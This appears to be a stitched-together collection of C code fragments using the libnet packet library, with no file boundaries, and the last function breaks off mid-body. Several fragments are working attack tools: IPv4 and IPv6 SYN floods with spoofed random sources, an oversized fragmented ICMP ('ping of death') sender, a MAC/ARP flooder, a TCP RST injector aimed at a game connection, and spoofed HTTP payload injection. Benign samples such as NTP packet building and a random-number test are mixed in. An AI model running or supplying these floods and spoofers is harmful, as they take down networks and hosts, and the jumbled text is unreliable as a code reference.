int main() {
int i;
char errbuf[LIBNET_ERRBUF_SIZE];
/* It's a good idea to have the payload as an array of
* * bytes. If yours isn't, make a pointer to it and cast
* * it.*/
u_int8_t payload[3000];
l = libnet_init(LIBNET_RAW4, "eth0", errbuf);
if (l == NULL) {
fprintf(stderr, "libnet_init() failed (raw4, 1st call): %s\n", errbuf);
exit(EXIT_FAILURE);
}
/* Generating random payload */
libnet_seed_prand(l);
for (i = 0; i < sizeof(payload); i++) {
payload[i] = libnet_get_prand(LIBNET_PR8);
}
/* Building and sending the fragments */
frag_and_send(payload, sizeof(payload));
libnet_destroy(l);
return 0;
}
libnet_ptag_t
build_pkt (libnet_t * l, u_long * seq, struct libnet_in6_addr src,
struct libnet_in6_addr victim)
{
libnet_ptag_t ip_tag, tcp_tag;
ip_tag = tcp_tag = LIBNET_PTAG_INITIALIZER;
libnet_seed_prand (l);
*seq = (u_long) libnet_get_prand (LIBNET_PRu32);
tcp_tag = libnet_build_tcp (0,
0,
*seq,
libnet_get_prand (LIBNET_PRu32),
TH_SYN,
libnet_get_prand (LIBNET_PRu16),
0, 0, LIBNET_TCP_H, NULL, 0, l, 0);
ip_tag = libnet_build_ipv6 (0,
0,
LIBNET_TCP_H,
IPPROTO_TCP, 64, src, victim, NULL, 0, l, 0);
return tcp_tag;
}
uint16_t buildICMP_h(libnet_t *l, uint32_t dip, uint8_t *PAYLOAD)
{
uint16_t seqn, id, bytes_w;
libnet_seed_prand(l);
id= (uint16_t)libnet_get_prand(LIBNET_PR16);
seqn =1;
icmp_t = libnet_build_icmpv4_echo(ICMP_ECHO,
0, 0, id, seqn, PAYLOAD, PAYLOAD_L, l, icmp_t);
if(icmp_t == -1)
{
fprintf(stderr,"libnet_build_ethernet() failed: %s\n",errbuf);
goto bad;
}
ip_t = libnet_autobuild_ipv4(
LIBNET_IPV4_H+LIBNET_ICMPV4_ECHO_H+PAYLOAD_L,
IPPROTO_ICMP, dip,l);
if(ip_t == -1)
{
fprintf(stderr,"libnet_autobuild_ipv4() failed: %s\n",errbuf);
goto bad;
}
bytes_w = libnet_write(l);
if(bytes_w == -1)
{
fprintf(stderr,"libnet_write() failed: %s\n",errbuf);
goto bad;
}
return 1;
bad:
return -1;
}
int main (int argc, char **argv)
{
unsigned long fakesrc, target;
unsigned char *buf;
unsigned char *data;
int sock, i, flags, offset, len;
if (argc != 2 || !(target = libnet_name_resolve(argv[1], 1)))
{
fprintf(stderr, "Usage: %s <target>\n", argv[0]);
exit(1);
}
if ((sock = libnet_open_raw_sock(IPPROTO_RAW)) == -1)
{
perror("raw sock");
exit(1);
}
/* get random src addr. */
libnet_seed_prand();
fakesrc = libnet_get_prand(LIBNET_PRu32);
buf = malloc(LIBNET_IP_H + LIBNET_ICMP_ECHO_H);
data = (unsigned char *)malloc(FRAG_LEN);
for (i = 0 ; i < 65536 ; i += (LIBNET_ICMP_ECHO_H + FRAG_LEN))
{
offset = i;
flags = 0;
if (offset < 65120)
{
flags = IP_MF;
len = FRAG_LEN;
}
else len = 410; /* for total reconstructed len of 65538 */
/* make IP header. */
libnet_build_ip(LIBNET_ICMP_ECHO_H + len, 0, 666,
flags | (offset >> 3), 64, IPPROTO_ICMP, fakesrc, target,
NULL, 0, buf);
/* make ICMP packet. */
libnet_build_icmp_echo(8, 0, 666, 666, data, len, buf + LIBNET_IP_H);
/* calculate ICMP checksum. */
libnet_do_checksum(buf, IPPROTO_ICMP, LIBNET_ICMP_ECHO_H + len);
/* send it. */
libnet_write_ip(sock, buf, LIBNET_IP_H + LIBNET_ICMP_ECHO_H + len);
/* tcpdump-style jonks. */
printf("%s > %s: (frag 666:%d@%d%s)\n", libnet_host_lookup(fakesrc,0),
argv[1], LIBNET_ICMP_ECHO_H + len, offset, flags ? "+" : "");
}
free(buf);
return (EXIT_SUCCESS);
}
void
tcpkill_init(void)
{
char *intf, ebuf[PCAP_ERRBUF_SIZE];
char libnet_ebuf[LIBNET_ERRBUF_SIZE];
if ((intf = pcap_lookupdev(ebuf)) == NULL)
errx(1, "%s", ebuf);
if ((l = libnet_init(LIBNET_RAW4, intf, libnet_ebuf)) == NULL)
errx(1, "couldn't initialize sending");
libnet_seed_prand(l);
}
//===============================
//I tried to do this same concept using LIBNET_RAW4 instead of LIBNET_LINK so
//I wouldn't have to worry about the ethernet header. But something weird happens when I
//try to do this. If there is already an established connection.. e.g. 70.116.23.2:3779 to
//192.168.0.2:6112, if we send the packet using raw4, in tcpdump we get
//70.116.23.2:1024 --> 192.168.0.2:6112. I am really not sure why it won't send the correct
//source port if that connection is already established, but using LIBNET_LINK seems to not
//have this problem. I believe it is a kernel related issue.
void TcpKill::Execute(const wxString &sIp, u_int nPort)
{
char szErrBuf[LIBNET_ERRBUF_SIZE];
libnet_ptag_t ip;
libnet_ptag_t tcp;
wxString sSniffDevice = CONFIG(wxString, "Network/SniffDevice");
wxString sGameHost = CONFIG(wxString, "Network/GameHost");
int nGamePort = CONFIG(int, "Network/GamePort");
shared_ptr<NodeInfo> pNodeInfo = Info::Get()->GetNodeInfo(sIp, nPort);
if (!pNodeInfo) {
//Interface::Get()->Output(wxString::Format("Can't find %s:%d in net info map.", m_sIp.c_str(), m_nPort), OUTPUT_ERROR);
return;
}
NetInfo &netInfo = Info::Get()->GetNetInfo();
//This is pretty inefficient since I constantly init libnet and destroy it. It would be better
//if we could init once and just keep changing the sequence number and destination ip.
for (u_int x = 0; x < m_nSeverity; x++) {
u_int32_t seq_out = pNodeInfo->last_sentack;
libnet_t *pLibnet = libnet_init(LIBNET_LINK, const_cast<char *>(sSniffDevice.c_str()), szErrBuf);
libnet_seed_prand(pLibnet);
tcp = libnet_build_tcp(nPort, nGamePort,
seq_out, 0, TH_RST, 0, 0, 0, LIBNET_TCP_H, NULL, 0, pLibnet, 0);
u_long src_ip = libnet_name2addr4(pLibnet, const_cast<char *>(sIp.c_str()), LIBNET_DONT_RESOLVE);
u_long dst_ip = libnet_name2addr4(pLibnet, const_cast<char *>(sGameHost.c_str()), LIBNET_DONT_RESOLVE);
ip = libnet_build_ipv4(sizeof(net_ip) + sizeof(net_tcp), 0,
libnet_get_prand(LIBNET_PRu16), 0, 64, IPPROTO_TCP, 0,
src_ip, dst_ip, NULL, 0, pLibnet, 0);
libnet_autobuild_ethernet(netInfo.gamehost_ether, ETHERTYPE_IP, pLibnet);
libnet_write(pLibnet);
libnet_destroy(pLibnet);
}
}
void send_syns(libnet_t *libnet, u_int32_t source_addr, u_int32_t target_addr, unsigned int port, useconds_t delay) {
libnet_seed_prand(libnet);
for(;;) {
libnet_clear_packet(libnet);
libnet_build_tcp(libnet_get_prand(LIBNET_PRu16), port,
libnet_get_prand(LIBNET_PRu32), libnet_get_prand(LIBNET_PRu32),
TH_SYN, 8192, 0, 0, LIBNET_TCP_H,
NULL, 0, libnet, 0);
libnet_build_ipv4(LIBNET_IPV4_H + LIBNET_TCP_H, 0,
libnet_get_prand(LIBNET_PRu16), 0, 64,
IPPROTO_TCP, 0, source_addr,
target_addr, NULL, 0, libnet, 0);
if (libnet_write(libnet) < 0)
warn("writing SYN failed");
usleep(delay);
}
}
// Initialise fake TCP session state
int init_fake_session_state( FakeSessionState* fakeSess )
{
// Init libnet context
fakeSess->ln = libnet_init(
LIBNET_LINK,
config.cap[capindex]->dst_interface,
errbuf.libnet
);
if( fakeSess->ln == NULL )
{
if (config.daemon)
syslog(LOG_ERR, "error opening libnet context: %s", errbuf.libnet);
else
fprintf(stderr, "Error opening libnet context: %s.\n", errbuf.libnet);
return( -1 );
}
if( libnet_seed_prand( fakeSess->ln ) == -1 )
{
if (config.daemon)
syslog(LOG_ERR, "error seeding libnet prand: %s", errbuf.libnet);
else
fprintf(stderr, "Error seeding libnet prand: %s.\n", errbuf.libnet);
libnet_destroy( fakeSess->ln );
return( -1 );
}
// Initialise other member variables
fakeSess->handshakeSent = 0;
fakeSess->clientSeq = libnet_get_prand (LIBNET_PRu16);
fakeSess->serverSeq = libnet_get_prand (LIBNET_PRu16);
return( 1 );
}
void *macflood(void *n) {
int32_t i,c;
u_char smaca[ETHER_ADDR_LEN], dmaca[ETHER_ADDR_LEN];
libnet_t *llif;
char ebuf[PCAP_ERRBUF_SIZE];
libnet_ptag_t pkt;
u_int8_t *packet;
u_int32_t packet_s;
for(i=0; i != *(int32_t *)n; ++i) {
// initiliaze libnet context
if((llif=libnet_init(LIBNET_LINK_ADV, intf, ebuf))==NULL)
errx(1, "%s", ebuf);
// Initialize Randomgenerator
libnet_seed_prand(llif);
// Generate random source mac
gen_mac(smaca);
gen_mac(dmaca);
//build ARP
if ((pkt = libnet_build_arp(
ARPHRD_ETHER, /* hardware addr */
ETHERTYPE_IP, /* protocol addr */
6, /* hardware addr size */
4, /* protocol addr size */
ARPOP_REQUEST, /* operation type */
empty_mac, /* sender hardware addr */
(u_int8_t *)&empty_ip, /* sender protocol addr */
empty_mac,
(u_int8_t *)&empty_ip, /* target protocol addr */
NULL, /* payload */
0, /* payload size */
llif, /* libnet context */
0))==-1) /* libnet id */
fprintf(stderr, "Can't build ARP header: %s\n", libnet_geterror(llif));
// Build ethernet
if ((pkt = libnet_build_ethernet(
dmaca, /* ethernet destination */
smaca, /* source macadress */
ETHERTYPE_ARP, /* protocol type */
NULL, /* Payload */
0, /* length of payload*/
llif, /* libnet id */
0))==-1) /* ptag */
fprintf(stderr, "Can't build ethernet header: %s\n",
libnet_geterror(llif));
if (libnet_adv_cull_packet(llif, &packet, &packet_s) == -1)
fprintf(stderr, "%s", libnet_geterror(llif));
// Write package to wire
if ((c = libnet_write(llif))==-1)
errx(1, "Write error: %s\n", libnet_geterror(llif));
if(verbose)
fprintf(stderr, "SRC-MAC: %x:%x:%x:%x:%x:%x |"
"DST-MAC: %x:%x:%x:%x:%x:%x\n",
smaca[0],smaca[1],smaca[2],smaca[3],smaca[4],smaca[5],
dmaca[0], dmaca[1], dmaca[2], dmaca[3], dmaca[4], dmaca[5]);
libnet_destroy(llif);
}
fprintf(stderr, "%d Packages sent.\n", *(int32_t *)n);
}
int
main(int argc, char **argv)
{
struct libnet_in6_addr dst_ip;
struct libnet_in6_addr src_ip;
u_short dst_prt = 0;
u_short src_prt = 0;
libnet_t *l;
libnet_ptag_t t;
char *cp;
char errbuf[LIBNET_ERRBUF_SIZE];
int i, c, packet_amt, burst_int, burst_amt, build_ip;
char srcname[100],dstname[100];
packet_amt = 0;
burst_int = 0;
burst_amt = 1;
printf("libnet 1.1 syn flooding: TCP6[raw]\n");
/*
* Initialize the library. Root priviledges are required.
*/
l = libnet_init(
LIBNET_RAW6, /* injection type */
NULL, /* network interface */
errbuf); /* error buffer */
if (l == NULL)
{
fprintf(stderr, "libnet_init() failed: %s", errbuf);
exit(EXIT_FAILURE);
}
while((c = getopt(argc, argv, "t:a:i:b:")) != EOF)
{
switch (c)
{
case 't':
if (!(cp = strrchr(optarg, '/')))
{
usage(argv[0]);
exit(EXIT_FAILURE);
}
*cp++ = 0;
dst_prt = (u_short)atoi(cp);
dst_ip = libnet_name2addr6(l, optarg, 1);
if (strncmp((char*)&dst_ip,(char*)&in6addr_error,sizeof(in6addr_error))==0)
{
fprintf(stderr, "Bad IP6 address: %s\n", optarg);
exit(EXIT_FAILURE);
}
break;
case 'a':
packet_amt = atoi(optarg);
break;
case 'i':
burst_int = atoi(optarg);
break;
case 'b':
burst_amt = atoi(optarg);
break;
default:
usage(argv[0]);
exit(EXIT_FAILURE);
}
}
src_ip = libnet_name2addr6(l, "0:0:0:0:0:0:0:1", LIBNET_DONT_RESOLVE);
/*src_ip = libnet_name2addr6(l, "3ffe:400:60:4d:250:fcff:fe2c:a9cd", LIBNET_DONT_RESOLVE);
dst_prt = 113;
dst_ip = libnet_name2addr6(l, "nathan.ip6.uni-ulm.de", LIBNET_RESOLVE);
packet_amt = 1;*/
if (!dst_prt || strncmp((char*)&dst_ip,(char*)&in6addr_error,sizeof(in6addr_error))==0 || !packet_amt)
{
usage(argv[0]);
exit(EXIT_FAILURE);
}
libnet_seed_prand(l);
libnet_addr2name6_r(src_ip,1,srcname,sizeof(srcname));
libnet_addr2name6_r(dst_ip,1,dstname,sizeof(dstname));
for(t = LIBNET_PTAG_INITIALIZER, build_ip = 1; burst_amt--;)
{
for (i = 0; i < packet_amt; i++)
{
char payload[56];
int i;
for (i=0; i<56; i++) payload[i]='A'+((char)(i%26));
t = libnet_build_tcp(
src_prt = libnet_get_prand(LIBNET_PRu16),
dst_prt,
libnet_get_prand(LIBNET_PRu32),
libnet_get_prand(LIBNET_PRu32),
TH_SYN,
libnet_get_prand(LIBNET_PRu16),
0,
0,
LIBNET_TCP_H,
NULL,
0,
l,
t);
if (build_ip)
{
build_ip = 0;
printf("Packet len = %ld\n",LIBNET_ICMPV6_H+sizeof(payload));
libnet_build_ipv6(0,0,
LIBNET_TCP_H,
IPPROTO_TCP,
64,
src_ip,
dst_ip,
NULL,
0,
l,
0);
}
printf("%15s/%5d -> %15s/%5d\n",
srcname,
ntohs(src_prt),
dstname,
dst_prt);
c = libnet_write(l);
if (c == -1)
{
fprintf(stderr, "libnet_write: %s\n", libnet_geterror(l));
}
#if !(__WIN32__)
usleep(250);
#else
Sleep(250);
#endif
}
#if !(__WIN32__)
sleep(burst_int);
#else
Sleep(burst_int * 1000);
#endif
}
exit(EXIT_SUCCESS);
}
int main(int argc, char *argv[])
{
int c, i;
u_char *cp;
libnet_t *l;
libnet_ptag_t ip;
libnet_ptag_t tcp;
struct libnet_stats ls;
u_long src_ip, dst_ip;
u_short src_prt, dst_prt;
u_char opt[20];
char errbuf[LIBNET_ERRBUF_SIZE];
FILE *dmf;
char *dms;
int pay_s;
char *dmfn = "kw.txt";
char *paybuf, *pp;
u_char bt;
char linebuf[MAXTEXT];
/* Initialize the library. Root priviledges are required. */
l = libnet_init(
LIBNET_RAW4, /* injection type */
NULL, /* network interface */
errbuf); /* errbuf */
if (l == NULL)
{
fprintf(stderr, "libnet_init() failed: %s\n", errbuf);
exit(EXIT_FAILURE);
}
libnet_seed_prand(l);
tcp = 0;
ip = 0;
dst_ip = libnet_get_prand(LIBNET_PRu32);
src_ip = libnet_get_prand(LIBNET_PRu32);
src_prt = libnet_get_prand(LIBNET_PRu16);
dst_prt = 80; /* http */
while ((c = getopt(argc, argv, "d:s:p:f:")) != EOF)
{
switch (c)
{
case 'd':
if ((dst_ip = libnet_name2addr4(l, optarg, LIBNET_RESOLVE)) == -1)
{
fprintf(stderr, "Bad destination IP address: %s\n", optarg);
exit(EXIT_FAILURE);
}
break;
case 's':
if ((src_ip = libnet_name2addr4(l, optarg, LIBNET_RESOLVE)) == -1)
{
fprintf(stderr, "Bad source IP address: %s\n", optarg);
exit(EXIT_FAILURE);
}
break;
case 'p':
dst_prt = (u_short)atoi(optarg);
printf("Dest port: %d\n", dst_prt);
break;
case 'f':
dmfn = optarg;
printf("File name: %s\n", dmfn);
break;
default:
exit(EXIT_FAILURE);
}
}
/* Read the keywords, dest IPs, src IPs , and construct http payload */
if( (dmf = fopen(dmfn, "r")) == NULL) {
fprintf(stderr, "Error opening the content file %s \n", dmfn);
exit(1);
} /* end if */
printf("Reading content ...\n");
i = 0;
while ((i < MAXTEXT) && ( (c=fgetc(dmf)) != EOF ) )
{
linebuf[i++] = c;
}
fclose(dmf);
linebuf[i] = '\0';
paybuf = linebuf;
dms = (char *)malloc(strlen(paybuf)+1); /* alloc mem */
strcpy(dms, paybuf);
pay_s = strlen(dms);
/* ===== for message body debugging */
printf("Content read:\n");
for (i=0; i < pay_s; i++) {
bt = *(dms + i);
printf(" %02X", bt);
}
printf("\n");
/*=== */
/* Building TCP */
tcp = libnet_build_tcp(
src_prt, /* source port */
dst_prt, /* destination port */
libnet_get_prand(LIBNET_PRu32),
libnet_get_prand(LIBNET_PRu32),
0x18, /* (PSH, ACK) */
libnet_get_prand(LIBNET_PRu16), /* window size */
0, /* checksum */
0, /* urgent pointer */
LIBNET_TCP_H + pay_s, /* packet length */
dms, /* payload */
pay_s, /* payload size */
l, /* libnet handle */
tcp); /* libnet id */
if (tcp == -1) {
fprintf(stderr, "Can't build TCP header: %s\n", libnet_geterror(l));
goto bad;
}
/* Building IP */
ip = libnet_build_ipv4(
LIBNET_IPV4_H + pay_s + LIBNET_TCP_H, /* length */
0x00, /* TOS */
0, /* IP ID */
0x4000, /* IP Frag */
64, /* TTL */
IPPROTO_TCP, /* protocol */
0, /* checksum */
src_ip,
dst_ip,
NULL, /* payload */
0, /* payload size */
l, /* libnet handle */
ip); /* libnet id */
if (ip == -1) {
fprintf(stderr, "Can't build IP header: %s\n", libnet_geterror(l));
goto bad;
}
/* Write it to the wire. */
c = libnet_write(l);
if (c == -1) {
fprintf(stderr, "Write error: %s\n", libnet_geterror(l));
goto bad;
} else {
/* printf("Wrote %d byte TCP packet; check the wire.\n", c); */
}
/* usleep(20); slow down to conserve bandwidth */
libnet_stats(l, &ls);
fprintf(stderr, "Packets sent: %ld\n"
"Packet errors: %ld\n"
"Bytes written: %ld\n",
ls.packets_sent, ls.packet_errors, ls.bytes_written);
libnet_destroy(l);
return (EXIT_SUCCESS);
bad:
libnet_destroy(l);
return (EXIT_FAILURE);
}
int main(int argc, char *argv[]) {
u_long dest_ip;
u_short dest_port;
u_char errbuf[LIBNET_ERRBUF_SIZE], *packet;
int opt, network, byte_count, packet_size = LIBNET_IP_H + LIBNET_TCP_H;
if(argc < 3)
{
printf("使用方法:\n%s\t <対象ホスト> <対象ポート>\n", argv[0]);
exit(1);
}
dest_ip = libnet_name_resolve(argv[1], LIBNET_RESOLVE); // ホスト
dest_port = (u_short) atoi(argv[2]); // ポート番号
network = libnet_open_raw_sock(IPPROTO_RAW); // ネットワークインタフェースをオープンする
if (network == -1)
libnet_error(LIBNET_ERR_FATAL, "can't open network interface. -- this program must run as root.\n");
libnet_init_packet(packet_size, &packet); // パケット用のメモリを割り当てる
if (packet == NULL)
libnet_error(LIBNET_ERR_FATAL, "can't initialize packet memory.\n");
libnet_seed_prand(); // 乱数生成器に種を与える
printf("SYN Flooding port %d of %s..\n", dest_port, print_ip(&dest_ip));
while(1) // 永久ループ(CTRL-Cで終了されるまで)
{
libnet_build_ip(LIBNET_TCP_H, // IPヘッダを除いたパケットのサイズ
IPTOS_LOWDELAY, // IP tos
libnet_get_prand(LIBNET_PRu16), // IP ID(乱数化)
0, // 断片化
libnet_get_prand(LIBNET_PR8), // TTL (乱数化)
IPPROTO_TCP, // トランスポートプロトコル
libnet_get_prand(LIBNET_PRu32), // 送信元IP (乱数化)
dest_ip, // 宛先IP
NULL, // ペイロード(なし)
0, // ペイロード長
packet); // パケットヘッダメモリ
libnet_build_tcp(libnet_get_prand(LIBNET_PRu16), // 送信元TCPポート (乱数化)
dest_port, // 宛先TCPポート
libnet_get_prand(LIBNET_PRu32), // シーケンス番号 (乱数化)
libnet_get_prand(LIBNET_PRu32), // ACK番号 (乱数化)
TH_SYN, // コントロールフラグ (SYNフラグのみ設定)
libnet_get_prand(LIBNET_PRu16), // ウィンドウサイズ (乱数化)
0, // 至急ポインタ
NULL, // ペイロード (なし)
0, // ペイロード長
packet + LIBNET_IP_H); // パケットヘッダメモリ
if (libnet_do_checksum(packet, IPPROTO_TCP, LIBNET_TCP_H) == -1)
libnet_error(LIBNET_ERR_FATAL, "can't compute checksum\n");
byte_count = libnet_write_ip(network, packet, packet_size); // パケットを注入する
if (byte_count < packet_size)
libnet_error(LIBNET_ERR_WARNING, "Warning: Incomplete packet written. (%d of %d bytes)", byte_count, packet_size);
usleep(FLOOD_DELAY); // FLOOD_DELAYミリ秒待機する
}
libnet_destroy_packet(&packet); // パケットメモリを解放する
if (libnet_close_raw_sock(network) == -1) // ネットワークインタフェースをクローズする
libnet_error(LIBNET_ERR_WARNING, "can't close network interface.");
return 0;
}
int
main(int argc, char **argv)
{
int i, j;
printf("Psuedorandom number generation\n");
printf("For each trial, 1000 numbers will be generated\n");
libnet_seed_prand();
printf("\n\nPress return for trial 1 (0 - 1)\n\n");
getc(stdin);
for (i = 1000; i; i--)
{
printf("%ld ", libnet_get_prand(LIBNET_PR2));
}
printf("\n\nPress return for trial 2 (0 - 255)\n\n");
getc(stdin);
for (i = 1000; i; i--)
{
printf("%3ld ", libnet_get_prand(LIBNET_PR8));
}
printf("\n\nPress return for trial 3 (0 - 32767)\n\n");
getc(stdin);
for (j = 13, i = 1000; i; i--, j--)
{
if (!j)
{
printf("\n");
j = 13;
}
printf("%5ld ", libnet_get_prand(LIBNET_PR16));
}
printf("\n\nPress return for trial 4 (0 - 65535)\n\n");
getc(stdin);
for (j = 13, i = 1000; i; i--, j--)
{
if (!j)
{
printf("\n");
j = 13;
}
printf("%5ld ", libnet_get_prand(LIBNET_PRu16));
}
printf("\n\nPress return for trial 5 (0 - 2147483647)\n\n");
getc(stdin);
for (j = 7, i = 1000; i; i--, j--)
{
if (!j)
{
printf("\n");
j = 7;
}
printf("%10ld ", libnet_get_prand(LIBNET_PR32));
}
printf("\n\nPress return for trial 6 (0 - 4294967295)\n\n");
getc(stdin);
for (j = 7, i = 1000; i; i--, j--)
{
if (!j)
{
printf("\n");
j = 7;
}
printf("%10ld ", libnet_get_prand(LIBNET_PRu32));
}
printf("\nCompleted\n");
return (EXIT_SUCCESS);
}
void send_acks(pcap_t *pcap, libnet_t *libnet)
{
libnet_seed_prand(libnet);
pcap_loop(pcap, -1, tcp_answer_ack, (u_char *)libnet);
}
int
main(int argc, char **argv)
{
struct libnet_in6_addr dst_ip;
struct libnet_in6_addr src_ip;
u_short dst_prt = 0;
u_short src_prt = 0;
libnet_t *l;
libnet_ptag_t t;
char *cp;
char errbuf[LIBNET_ERRBUF_SIZE];
int i, c, packet_amt, burst_int, burst_amt, build_ip;
char srcname[100],dstname[100];
packet_amt = 0;
burst_int = 0;
burst_amt = 1;
printf("libnet 1.1 unreach/admin prohibited request ICMP6[raw]\n");
/*
* Initialize the library. Root priviledges are required.
*/
l = libnet_init(
LIBNET_RAW6, /* injection type */
NULL, /* network interface */
errbuf); /* error buffer */
if (l == NULL)
{
fprintf(stderr, "libnet_init() failed: %s", errbuf);
exit(EXIT_FAILURE);
}
while((c = getopt(argc, argv, "t:a:i:b:")) != EOF)
{
switch (c)
{
case 't':
if (!(cp = strrchr(optarg, '/')))
{
usage(argv[0]);
exit(EXIT_FAILURE);
}
*cp++ = 0;
dst_prt = (u_short)atoi(cp);
dst_ip = libnet_name2addr6(l, optarg, 1);
if (strncmp((char*)&dst_ip,(char*)&in6addr_error,sizeof(in6addr_error))==0)
{
fprintf(stderr, "Bad IP6 address: %s\n", optarg);
exit(EXIT_FAILURE);
}
break;
case 'a':
packet_amt = atoi(optarg);
break;
case 'i':
burst_int = atoi(optarg);
break;
case 'b':
burst_amt = atoi(optarg);
break;
default:
usage(argv[0]);
exit(EXIT_FAILURE);
}
}
if (!dst_prt || strncmp((char*)&dst_ip,(char*)&in6addr_error,sizeof(in6addr_error))==0 || !packet_amt)
{
usage(argv[0]);
exit(EXIT_FAILURE);
}
libnet_seed_prand(l);
libnet_addr2name6_r(src_ip,1,srcname,sizeof(srcname));
libnet_addr2name6_r(dst_ip,1,dstname,sizeof(dstname));
for(t = LIBNET_PTAG_INITIALIZER, build_ip = 1; burst_amt--;)
{
for (i = 0; i < packet_amt; i++)
{
uint8_t payload[56];
int i;
for (i=0; i<sizeof(payload); i++)
payload[i]='A'+(i%26);
t = libnet_build_icmpv6_unreach (
ICMP6_UNREACH, /* type */
ICMP6_ADM_PROHIBITED, /* code */
0, /* checksum */
payload, /* payload */
sizeof(payload), /* payload length */
l, /* libnet context */
t); /* libnet ptag */
if (build_ip)
{
build_ip = 0;
libnet_build_ipv6(0,0,
LIBNET_IPV6_H + LIBNET_ICMPV6_H + sizeof(payload),
IPPROTO_ICMP6,
64,
src_ip,
dst_ip,
NULL,
0,
l,
0);
}
printf("%15s/%5d -> %15s/%5d\n",
srcname,
ntohs(src_prt),
dstname,
dst_prt);
c = libnet_write(l);
if (c == -1)
{
fprintf(stderr, "libnet_write: %s\n", libnet_geterror(l));
}
#if !(__WIN32__)
usleep(250);
#else
Sleep(250);
#endif
}
#if !(__WIN32__)
sleep(burst_int);
#else
Sleep(burst_int * 1000);
#endif
}
exit(EXIT_SUCCESS);
}
int
main(int argc, char *argv[])
{
extern char *optarg;
extern int optind;
int c;
char *intf, *filter, ebuf[PCAP_ERRBUF_SIZE];
char libnet_ebuf[LIBNET_ERRBUF_SIZE];
libnet_t *l;
pcap_t *pd;
intf = NULL;
while ((c = getopt(argc, argv, "i:AIMh?V")) != -1) {
switch (c) {
case 'i':
intf = optarg;
break;
case 'A':
Opt_win = 1;
break;
case 'I':
Opt_icmp = 1;
break;
case 'M':
Opt_pmtu = 1;
break;
default:
usage();
break;
}
}
if (intf == NULL && (intf = pcap_lookupdev(ebuf)) == NULL)
errx(1, "%s", ebuf);
argc -= optind;
argv += optind;
if (argc == 0)
usage();
if ((Opt_win | Opt_icmp | Opt_pmtu) == 0)
Opt_win = Opt_icmp = Opt_pmtu = 1;
filter = copy_argv(argv);
if ((pd = pcap_init(intf, filter, 128)) == NULL)
errx(1, "couldn't initialize sniffing");
if ((pcap_off = pcap_dloff(pd)) < 0)
errx(1, "couldn't determine link layer offset");
if ((l = libnet_init(LIBNET_RAW4, intf, libnet_ebuf)) == NULL)
errx(1, "couldn't initialize sending");
libnet_seed_prand(l);
warnx("listening on %s [%s]", intf, filter);
pcap_loop(pd, -1, tcp_nice_cb, (u_char *)l);
/* NOTREACHED */
exit(0);
}
int
main(int argc, char **argv)
{
int c;
libnet_t *l;
u_long dst_ip;
libnet_ptag_t t;
char errbuf[LIBNET_ERRBUF_SIZE];
printf("libnet 1.1 NTP packet shaping[raw -- autobuilding IP]\n");
/*
* Initialize the library. Root priviledges are required.
*/
l = libnet_init(
LIBNET_RAW4, /* injection type */
NULL, /* network interface */
errbuf); /* error buf */
if (l == NULL)
{
fprintf(stderr, "libnet_init() failed: %s", errbuf);
exit(EXIT_FAILURE);
}
dst_ip = 0;
while((c = getopt(argc, argv, "d:")) != EOF)
{
switch (c)
{
/*
* We expect the input to be of the form `ip.ip.ip.ip.port`. We
* point cp to the last dot of the IP address/port string and
* then seperate them with a NULL byte. The optarg now points to
* just the IP address, and cp points to the port.
*/
case 'd':
if ((dst_ip = libnet_name2addr4(l, optarg, LIBNET_RESOLVE)) == -1)
{
fprintf(stderr, "Bad destination IP address: %s\n", optarg);
exit(1);
}
break;
}
}
if (!dst_ip)
{
usage(argv[0]);
exit(EXIT_FAILURE);
}
/*
* Build the packet, remmebering that order IS important. We must
* build the packet from lowest protocol type on up as it would
* appear on the wire. So for our NTP packet:
*
* --------------------------------------------------------------------
* | IP | UDP | NTP |
* --------------------------------------------------------------------
* ^ ^ ^
* |-------------- | |
* libnet_build_ipv4()--| | |
* | |
* libnet_build_udp()-------| |
* |
* libnet_build_ntp()------------------------------|
*/
t = libnet_build_ntp(
LIBNET_NTP_LI_AC, /* leap indicator */
LIBNET_NTP_VN_4, /* version */
LIBNET_NTP_MODE_S, /* mode */
LIBNET_NTP_STRATUM_PRIMARY, /* stratum */
4, /* poll interval */
1, /* precision */
0xffff, /* delay interval */
0xffff, /* delay fraction */
0xffff, /* dispersion interval */
0xffff, /* dispersion fraction */
LIBNET_NTP_REF_PPS, /* reference id */
0x11, /* reference ts int */
0x22, /* reference ts frac */
0x33, /* originate ts int */
0x44, /* originate ts frac */
0x55, /* receive ts int */
0x66, /* receive ts frac */
0x77, /* transmit ts interval */
0x88, /* transmit ts fraction */
NULL, /* payload */
0, /* payload size */
l, /* libnet handle */
0); /* libnet id */
if (t == -1)
{
fprintf(stderr, "Can't build NTP header: %s\n", libnet_geterror(l));
goto bad;
}
libnet_seed_prand(l);
t = libnet_build_udp(
libnet_get_prand(LIBNET_PRu16), /* source port */
123, /* NTP port */
LIBNET_UDP_H + LIBNET_NTP_H, /* UDP packet length */
0, /* checksum */
NULL, /* payload */
0, /* payload size */
l, /* libnet handle */
0); /* libnet id */
if (t == -1)
{
fprintf(stderr, "Can't build UDP header: %s\n", libnet_geterror(l));
goto bad;
}
t = libnet_autobuild_ipv4(
LIBNET_IPV4_H + LIBNET_UDP_H + LIBNET_NTP_H,/* packet length */
IPPROTO_UDP,
dst_ip,
l);
if (t == -1)
{
fprintf(stderr, "Can't build IP header: %s\n", libnet_geterror(l));
goto bad;
}
/*
* Write it to the wire.
*/
fprintf(stderr, "l contains a %d byte packet\n", libnet_getpacket_size(l));
c = libnet_write(l);
if (c == -1)
{
fprintf(stderr, "Write error: %s\n", libnet_geterror(l));
goto bad;
}
else
{
fprintf(stderr, "Wrote %d byte NTP packet; check the wire.\n", c);
}
libnet_destroy(l);
return (EXIT_SUCCESS);
bad:
libnet_destroy(l);
return (EXIT_FAILURE);
}
int main(int argc, char *argv[])
{
int c, i;
u_char *cp;
libnet_t *l;
libnet_ptag_t ip;
libnet_ptag_t tcp;
struct libnet_stats ls;
u_long nround;
u_long src_ip, dst_ip;
u_short src_prt, dst_prt;
u_char opt[20];
char errbuf[LIBNET_ERRBUF_SIZE];
FILE *dmf, *nsf, *srcf;
char *dms[MAXLINES], *nss[MAXLINES], *srcs[MAXLINES];
int pay_s[MAXLINES];
char *dmfn = "kw.txt";
char *nsfn = "dst.txt";
char *srcfn = "src.txt";
char *paybuf, *pp;
int jd = 0;
int jn = 0;
int js = 0;
int kd, kn;
u_char bt;
char lb[80];
char linebuf[80];
char payld[100], tpayld[100];
/* Read the keywords, dest IPs, src IPs , and construct http payload */
if( (dmf = fopen(dmfn, "r")) == NULL) {
fprintf(stderr, "Error opening key word file %s \n", dmfn);
exit(1);
} /* end if */
